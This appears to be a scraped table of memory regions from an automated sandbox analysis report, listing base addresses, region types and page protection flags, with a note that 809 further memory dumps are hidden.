|
||
1FB0000
|
unkown
|
page read and write
|
||
2B0000
|
heap private
|
page read and write
|
||
680000
|
heap private
|
page read and write
|
||
9C000
|
unkown
|
page read and write
|
||
2634000
|
heap private
|
page read and write
|
||
620000
|
heap default
|
page read and write
|
||
604000
|
heap default
|
page read and write
|
||
2790000
|
unkown
|
page readonly
|
||
2160000
|
unkown
|
page readonly
|
||
206D000
|
unkown
|
page read and write
|
||
212000
|
unkown
|
page execute and read and write
|
||
222000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
4F0000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
2500000
|
unkown
|
page read and write
|
||
B2E000
|
unkown
|
page read and write
|
||
2D2E000
|
unkown
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
41E000
|
unkown
|
page read and write
|
||
24EE000
|
unkown
|
page read and write
|
||
1B960000
|
unkown
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
2510000
|
unkown
|
page read and write
|
||
897000
|
heap default
|
page read and write
|
||
190000
|
heap private
|
page read and write
|
||
390000
|
heap private
|
page read and write
|
||
1F2000
|
unkown
|
page execute and read and write
|
||
4E0000
|
unkown
|
page read and write
|
||
C20000
|
heap private
|
page read and write
|
||
31FA000
|
unkown
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
35A5000
|
unkown
|
page read and write
|
||
13A000
|
stack
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
4D0000
|
heap default
|
page read and write
|
||
10020000
|
unkown
|
page execute and read and write
|
||
A10000
|
unkown
|
page readonly
|
||
130000
|
unkown
|
page execute and read and write
|
||
552000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2EAE000
|
stack
|
page read and write
|
||
1C77E000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
1ACF0000
|
unkown
|
page read and write
|
||
2A0000
|
heap default
|
page read and write
|
||
2060000
|
unkown
|
page readonly
|
||
7FF0005C000
|
unkown
|
page execute and read and write
|
||
240000
|
heap default
|
page read and write
|
||
2702000
|
heap private
|
page read and write
|
||
35A8000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
910000
|
heap default
|
page read and write
|
||
2130000
|
unkown
|
page readonly
|
||
8CD000
|
heap default
|
page read and write
|
||
2D30000
|
unkown
|
page write copy
|
||
3652000
|
unkown
|
page read and write
|
||
3200000
|
unkown
|
page read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
230000
|
heap private
|
page read and write
|
||
365C000
|
unkown
|
page read and write
|
||
3A2000
|
unkown
|
page execute and read and write
|
||
2A40000
|
heap private
|
page execute and read and write
|
||
5D4000
|
heap default
|
page read and write
|
||
887000
|
heap default
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
284000
|
heap default
|
page read and write
|
||
1DE7000
|
unkown
|
page readonly
|
||
180000
|
unkown
|
page execute and read and write
|
||
7FF002B0000
|
unkown
|
page execute and read and write
|
||
2C70000
|
unkown
|
page readonly
|
||
2800000
|
heap private
|
page read and write
|
||
2165000
|
heap private
|
page read and write
|
||
2090000
|
unkown
|
page readonly
|
There are 809 hidden memdumps, click here to show them.